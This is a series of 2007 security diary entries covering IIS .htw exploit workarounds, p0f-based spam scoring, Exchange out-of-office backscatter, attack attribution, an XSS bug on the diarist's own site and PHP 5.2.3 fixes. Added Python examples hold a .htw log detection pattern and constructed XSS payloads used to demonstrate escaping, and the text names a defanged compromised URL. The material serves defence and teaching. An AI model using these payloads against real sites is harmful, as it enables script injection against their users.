Don't be blindsided if you do not find "null.htw" in your document root directory: the exploit does not need that file at all. In fact the reference has to be to a file that does not exist, and since it can point anywhere, blocking that one name is not a working workaround either.

The one workaround that seems to be functioning is to install and configure URLScan, if you have not done so already. Andrew wrote in with: "use URLScan to block all requests for htw files (or, better yet, set URLScan never to permit requests for any extensions but ones you know you need)". URLScan as a workaround remains an ugly solution, as it adds filtering as an afterthought instead of proper security by design, but then again, not many web servers come with security as one of their very top requirements.

A reader pointed us to Aqtronix WebKnight as an alternative URL filter that could help stop the exploits against IIS (GNU licensed).
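As an added illustration (not code from the diary, from Microsoft or from any reader), the following Python script scans an IIS 6.0 W3C extended log for requests that reference an .htw file. It decodes percent-encoding repeatedly before checking the extension, so single- and double-encoded spellings of ".htw" are caught along with case variants and references to files that do not exist. The log excerpt is constructed for the example, the default IIS 6 field order is assumed, and the query strings are deliberately left out.

```python
import re
from urllib.parse import unquote

# Constructed IIS 6.0 W3C extended log excerpt (not taken from the diary).
# The default IIS 6 field order is assumed; query strings are deliberately "-".
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2007-06-02 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2007-06-02 00:00:01 10.0.0.5 GET /default.asp - 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2007-06-02 00:00:02 10.0.0.5 GET /null.htw - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2007-06-02 00:00:03 10.0.0.5 GET /docs/nothing-here.HTW - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2007-06-02 00:00:04 10.0.0.5 GET /any.%68tw - 80 - 203.0.113.9 curl/7.16.2 200 0 0
2007-06-02 00:00:05 10.0.0.5 GET /x.%2568tw/extra - 80 - 203.0.113.9 curl/7.16.2 200 0 0
2007-06-02 00:00:06 10.0.0.5 GET /images/logo.gif - 80 - 192.0.2.10 Mozilla/4.0 404 0 2
"""


def normalize_path(path, max_rounds=3):
    """Percent-decode until stable (bounded), then lower-case.

    IIS may already have decoded the request once before logging; decoding
    again is harmless and exposes double-encoded forms such as %2568tw.
    """
    current = path
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current.lower()


def is_htw_request(uri_stem):
    """True if any path segment ends in .htw after normalization.

    /null.htw/extra is flagged as well: the extension is what selects the
    script mapping, and the file itself does not need to exist.
    """
    norm = normalize_path(uri_stem)
    return any(segment.endswith('.htw') for segment in norm.split('/'))


def parse_w3c(lines):
    """Yield one dict per record, using the #Fields directive for column names."""
    fields = None
    for raw in lines:
        line = raw.rstrip('\r\n')
        if not line:
            continue
        if line.startswith('#Fields:'):
            fields = line.split()[1:]
            continue
        if line.startswith('#') or fields is None:
            continue
        values = line.split(' ')
        if len(values) != len(fields):
            continue  # truncated or malformed record; skip rather than misalign columns
        yield dict(zip(fields, values))


def find_htw_hits(log_text):
    """Return (timestamp, client ip, uri-stem, status) for every .htw request."""
    hits = []
    for record in parse_w3c(log_text.splitlines()):
        stem = record.get('cs-uri-stem', '')
        if is_htw_request(stem):
            hits.append((record['date'] + ' ' + record['time'],
                         record.get('c-ip', '-'), stem, record.get('sc-status', '-')))
    return hits


if __name__ == '__main__':
    for when, client, stem, status in find_htw_hits(SAMPLE_LOG):
        print(when, client, stem, status)
```

Run against the constructed excerpt, the script flags four of the six records, including the double-encoded one. If you see such hits, the matching URLScan setting is the [DenyExtensions] section of URLScan.ini, or, following Andrew's stricter advice, UseAllowExtensions=1 with an [AllowExtensions] list of only the extensions you know you serve.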

Swa Frantzen -- NET2S


Published: 2007-06-02

p0f, spam detection and OOF e-mails

I have no doubt that all our readers are struggling in the everlasting race between spammers and spam detection applications. Actually, I hardly know anyone who isn't running at least one tool that helps detect spam.

I’ve been a happy user of amavisd-new (http://www.ijs.si/software/amavisd) for a long time. Amavisd-new is actually only a framework and allows you to use almost anything – by default it will use the most popular anti-spam tool, SpamAssassin, but it is very easy to use other tools such as DSPAM. Amavisd-new’s flexibility is its most powerful weapon.

Analyzing network traffic to detect spam

One extremely cool plugin that Mark wrote is p0f-analyzer.pl (http://www.ijs.si/software/p0f-analyzer.pl). This is a simple service that can be used with p0f, the famous passive fingerprinting utility.

So how does this help us with spam detection, you might ask? First, let's see what p0f-analyzer does. p0f-analyzer has to run on your e-mail gateway and requires a p0f binary. It uses p0f's output to build a local cache of all incoming TCP sessions, kept for a limited time. Amavisd-new can now be configured to query p0f-analyzer in order to determine the operating system of the remote client, and it makes the result available in an X-Amavis-OS-Fingerprint header. Finally, you can add SpamAssassin rules on that header that trigger when a certain OS has been detected on the remote client. So why is this good? Well, now we can add a positive score (moving the e-mail closer to being classified as spam) if the remote client is, for example, running Windows 98: how many mail servers do you know running on this (unsupported) operating system?

If you're interested in playing with this, read amavisd-new's release notes (search for p0f to find out how to install and configure it). Just a word of caution: be sure to configure amavisd-new properly so you don't end up penalizing your own Windows clients!
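To make the mechanism concrete, here is an added Python sketch of the two halves of the pipeline: a time-limited cache of p0f results keyed by client address, and header-style scoring rules applied to the cached OS name. It is not Mark's p0f-analyzer.pl and not amavisd-new code. The p0f output lines are constructed in the style of p0f 2.x, the rule names, scores and the (ip, port) cache key are assumptions for the illustration, and the INTERNAL_NETS exemption implements the word of caution above about your own Windows clients.

```python
import ipaddress
import re
import time

# Constructed p0f 2.x style output (assumed format, not real capture data).
SAMPLE_P0F_OUTPUT = """203.0.113.45:3421 - Windows 98 (no SP) -> 10.0.0.1:25 (distance 14, link: ethernet/modem)
198.51.100.7:52110 - Linux 2.6 (newer, 1) -> 10.0.0.1:25 (distance 9, link: ethernet/modem)
192.168.1.20:1049 - Windows 98 (no SP) -> 10.0.0.1:25 (distance 0, link: ethernet/modem)
192.0.2.99:40000 - UNKNOWN [S4:64:1:60:M1460,S,T,N,W5:.:?:?] -> 10.0.0.1:25 (distance 11, link: unknown)
"""

P0F_LINE = re.compile(
    r'^(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+) - (?P<os>.+?) -> '
    r'(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)')


class FingerprintCache:
    """Keeps the OS guess for each (client ip, client port) for ttl seconds,
    mirroring what a p0f-analyzer style service would answer to amavisd-new."""

    def __init__(self, ttl_seconds=600, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock  # injectable so expiry can be tested without sleeping
        self._entries = {}

    def feed(self, line):
        """Parse one p0f output line; returns False for lines that don't match."""
        match = P0F_LINE.match(line)
        if not match:
            return False
        key = (match.group('src'), int(match.group('sport')))
        self._entries[key] = (match.group('os'), self.clock() + self.ttl)
        return True

    def lookup(self, src_ip, src_port):
        """OS string for the session, or None if unknown or expired."""
        entry = self._entries.get((src_ip, src_port))
        if entry is None:
            return None
        os_name, expires_at = entry
        if self.clock() > expires_at:
            del self._entries[(src_ip, src_port)]
            return None
        return os_name


# Rules in the spirit of SpamAssassin header rules on X-Amavis-OS-Fingerprint.
# Most specific first; only the first matching rule fires. Names and scores are assumed.
OS_RULES = [
    (re.compile(r'^Windows (95|98|ME)\b'), 1.5, 'L_P0F_WIN9X'),
    (re.compile(r'^Windows'), 0.5, 'L_P0F_WINDOWS'),
    (re.compile(r'^UNKNOWN'), 0.2, 'L_P0F_UNKNOWN'),
]

# Your own client networks: never penalize these (assumed ranges for the example).
INTERNAL_NETS = [ipaddress.ip_network('10.0.0.0/8'), ipaddress.ip_network('192.168.0.0/16')]


def os_fingerprint_score(src_ip, os_name):
    """Return (score, [rule names]) for a client with the given p0f result."""
    if os_name is None:
        return 0.0, []
    if any(ipaddress.ip_address(src_ip) in net for net in INTERNAL_NETS):
        return 0.0, []
    for pattern, score, name in OS_RULES:
        if pattern.search(os_name):
            return score, [name]
    return 0.0, []


def score_session(cache, src_ip, src_port):
    """Tie both halves together: look the session up, score it, report the header value."""
    os_name = cache.lookup(src_ip, src_port)
    score, fired = os_fingerprint_score(src_ip, os_name)
    header = 'X-Amavis-OS-Fingerprint: %s' % (os_name if os_name else 'unknown')
    return header, score, fired


if __name__ == '__main__':
    cache = FingerprintCache()
    for line in SAMPLE_P0F_OUTPUT.splitlines():
        cache.feed(line)
    for ip, port in [('203.0.113.45', 3421), ('192.168.1.20', 1049), ('192.0.2.99', 40000)]:
        print(ip, port, score_session(cache, ip, port))
```

With the constructed lines, the external Windows 98 client scores 1.5, the internal Windows 98 client scores nothing because of the exemption, and a session whose fingerprint has aged out of the cache falls back to "unknown" with no score rather than being guessed at.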

Dealing with backscatter OOF e-mails

I recently had to write a very simple plugin that detected e-mail messages with the subject of “Out of Office AutoReply: ***SPAM***”. Can you guess what this is?

If you thought about Exchange you were right. As you probably know, SpamAssassin marks e-mails detected as spam with ***SPAM*** in the Subject header. As business users almost always demand that out of office replies work even outside your organization, this (with Exchange) inevitably leads to backscatter e-mails produced by your own network. As far as I know, it's impossible to tell Exchange to drop e-mails marked with ***SPAM*** in the subject *before* it runs the OOF module. In other words, you end up sending OOF messages to innocent senders, since those addresses are almost always spoofed. So I ended up with a small plugin that detects such e-mails and drops them (actually, marks them as infected).

If you want to take a look at the plugin, you can get it here. Be careful with it and use it at your own risk, of course (it's been working fine for me for a couple of months already). The plugin is, as you will see, extremely simple, and so far it has never had a false positive (to produce a false positive, one of our users would have to send an e-mail with the subject above, which is hardly likely).

Once you have it working properly, it will generate logs such as this one:

Jun 2 00:00:00 larry amavis[15399]: (15399-13) Blocked INFECTED (OOF-REPLY), [INTERNAL_IP] [INTERNAL_IP] <internal@user.local> -> <qkep1zcy@chello.com>, quarantine: virus-WkCuYouCzJCS, Message-ID: <1E11F4042C05ED4BAA6BA96319DA566113774068@internal.host.local>, mail_id: WkCuYouCzJCS, Hits: -, size: 1243, Subject: "Out of Office AutoReply: ***SPAM*** Over 1000+ models branded watches to choose, from Swiss Rolex, Patek Philippe, Panerai, Omega & ... yn", 102 ms

You can see that amavisd-new nicely blocked this e-mail (and helped in reducing the amount of backscatter in the world for at least 1 e-mail).



Published: 2007-06-01

Massive list of compromised sites

Our first e-mail this morning was from Dave, who informed us about a compromised site ( hxxp://lawfuel. com /show-release.asp?ID=12419 ). Lorna took the lead on investigating the malware on this site, and in the process ended up with two massive lists of other compromised sites.

We haven't checked them all yet (and probably never will...) but I figure it's good to push out a list of these sites before it's too late on Friday.

For a list of URLs referenced see http://isc.sans.org/diaryimages/hosts20070601.txt


Published: 2007-06-01

Attributing Attacks

Our reader Dean sent us a screen shot from Wireshark, showing a scan for VNC servers from (mail.tehran.agri-jahad.ir). Indeed, this system appears to be a mail server in Iran:

220 mail.tehran.agri-jahad.ir Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830 ready at  Fri, 1 Jun 2007 20:54:41 +0330

With all the news about "Russia attacking Estonia", this nicely illustrates the problem in attributing attacks like this. Is the mail server in Iran compromised (my guess)? Who is launching the scan? Is it a random script kiddie, some bot herder, some government? If it is a government, which one?

The packets look the same and there is no way to tell the motivation. Only once your system is compromised may you be able to figure out why they did it (and I'd rather skip that step). Honeypots can help, but a more sophisticated attacker would likely realize what's going on. On the other hand, a sophisticated attacker may actually use some simple "script kiddie" tools first, in order to hide in the noise of bot probes.

One way to figure out what's going on is to check how many others are being "hit" by this same IP address. DShield is the tool to do just that: see http://www.dshield.org/ipinfo.html?ip= and you will find that a few thousand other targets got hit by the same IP address, and that port 5900 (VNC) appears to be the main attack method used!

(NB: rather than Wireshark screen shots, we prefer raw packet captures)


Published: 2007-06-01

Stupid XSS mistake, and why its so hard to write good code

Stefan Esser (www.hardened-php.net) wrote in earlier to let me know about an XSS issue with the search function of the ISC website. Of course, while I respect his opinion and skills very much, I was at first a bit skeptical (after all, I am not exactly suffering from low self esteem). However, he was helpful enough to provide a sample URL showing the problem.

So what happened and why? After all, I keep saying that a web site's search function is the first spot to look for XSS.

It's pretty simple (and stupid). I pre-fill the search box with the last term a user searched for. This string is pulled from the user's session, and the string is stored on the server. So I figured I didn't need to validate it. However, what I missed was that I hadn't validated it (actually, "escaped" is the better word) in the first place, when it came in :-(.

The interesting part is that this issue hadn't been found before. What probably saved me was a generic validation for '<script>' tags that is performed on all user input. So defense in depth did work.

I typically use a "safe_print" function, which is essentially just "print(htmlentities($string))". But I didn't use it in the header, as some pages do not include the necessary library (you may call that another mistake: it saves a few CPU cycles and disk reads, but hurts you down the road).

Personally, I find that good code review is probably the hardest part of dealing with these problems. You just can't review your own code (at least I can't). If you want to help: much of the ISC code is available via SourceForge (look for the "DShield" project).
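As an added example, not the ISC site's own code, here is the same mistake and fix rendered in Python: the stored search term is written into an input element's value attribute, once raw and once through a safe_print equivalent of print(htmlentities($string)). It also shows why a generic check for '<script>' can mask this kind of bug: an attribute-breakout payload needs no script tag at all. The element markup and the payloads are constructed for the illustration, not taken from Stefan's report.

```python
import html
import re

# The defence-in-depth check the diary credits with hiding the bug:
# reject any user input that contains a <script> tag.
SCRIPT_TAG = re.compile(r'<\s*script\b', re.IGNORECASE)


def passes_generic_filter(value):
    """True if the generic input validation would let this value through."""
    return SCRIPT_TAG.search(value) is None


def search_box_unsafe(last_term):
    """Vulnerable: the term from the session goes straight into the attribute."""
    return '<input type="text" name="q" value="%s">' % last_term


def safe_print(value):
    """Python counterpart of print(htmlentities($string)) for attribute context:
    escapes &, <, > and both quote characters."""
    return html.escape(value, quote=True)


def search_box_safe(last_term):
    """Fixed: escape at output time, regardless of where the value came from."""
    return '<input type="text" name="q" value="%s">' % safe_print(last_term)


# Markup is inert if the user content never leaves the quoted attribute value:
# no stray quote, no angle bracket, nothing between the closing quote and '>'.
INERT_MARKUP = re.compile(r'<input type="text" name="q" value="[^"<>]*">')


def stays_in_attribute(markup):
    return INERT_MARKUP.fullmatch(markup) is not None


# Constructed payloads for the illustration.
ATTRIBUTE_BREAKOUT = '" onmouseover="alert(1)'   # no <script> needed
SCRIPT_PAYLOAD = '<script>alert(1)</script>'


def demo():
    """Return (generic filter lets the breakout through,
               unsafe markup stays inert, safe markup stays inert)."""
    return (passes_generic_filter(ATTRIBUTE_BREAKOUT),
            stays_in_attribute(search_box_unsafe(ATTRIBUTE_BREAKOUT)),
            stays_in_attribute(search_box_safe(ATTRIBUTE_BREAKOUT)))


if __name__ == '__main__':
    print(search_box_unsafe(ATTRIBUTE_BREAKOUT))
    print(search_box_safe(ATTRIBUTE_BREAKOUT))
    print(demo())
```

The point of the demo tuple is the combination: the breakout payload passes the generic filter, turns the unsafe markup into an element with an extra event-handler attribute, and is rendered harmless by escaping at the point of output. Escaping on output is the rule that holds regardless of whether the value came from a query string, a session or a database.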


Published: 2007-06-01

PHP 5.2.3 released

PHP released PHP version 5.2.3.

From the release notes, the following security improvements have been made:

  • Fixed an integer overflow inside chunk_split() (CVE-2007-2872)
  • Fixed possible infinite loop in imagecreatefrompng. (CVE-2007-2756)
  • Fixed ext/filter Email Validation Vulnerability (CVE-2007-1900)
  • Fixed bug #41492 (open_basedir/safe_mode bypass inside realpath())
  • Improved fix for CVE-2007-1887 to work with non-bundled sqlite2 lib.
  • Added mysql_set_charset() to allow runtime altering of connection encoding.

Take care with the fixes not listed as security related as there seem to be at least a few of them that are interesting from either a security application point of view, or just from an availability point of view. E.g.:

  • Fixed bug #41353 (crash in openssl_pkcs12_read() on invalid input)
  • Fixed bug #41347 (checkdnsrr() segfaults on empty hostname)

If you are on the 5.2 branch, it is best to upgrade to 5.2.3 ASAP.

While recompiling and testing PHP, consider adding Suhosin from the Hardened PHP project; it will improve your security posture.

Swa Frantzen -- NET2S